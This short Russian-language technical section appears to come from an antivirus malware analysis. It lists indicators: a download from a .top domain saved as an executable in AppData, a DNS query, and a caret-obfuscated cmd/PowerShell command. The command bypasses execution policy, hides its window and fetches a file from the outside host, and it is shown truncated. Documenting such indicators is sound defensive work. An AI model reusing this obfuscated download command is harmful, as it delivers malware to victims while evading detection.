Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^we^R^shEll.^E^XE -E^XEcuTI^O^np^O^lIC^Y^ ^b^YP^asS ^-no^PRO^f^I^Le -^wIn^do^wstY^Le H^I^DdE^N ^(N^E^W-oBj^ECT^ sYs^teM.^Net^.w^eBCliENt).D^OW^n^loADFiLE^(^'http://www.do...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "Po^we^R^shEll.^E^XE -E^XEcuTI^O^np^O^lIC^Y^ ^b^YP^asS ^-no^PRO^f^I^Le -^wIn^do^wstY^Le H^I^DdE^N ^(N^E^W-oBj^ECT^ sYs^teM.^Net^.w^eBCliENt).D^OW^n^loADFiLE^(^'http://www.do...' (со скрытым окном)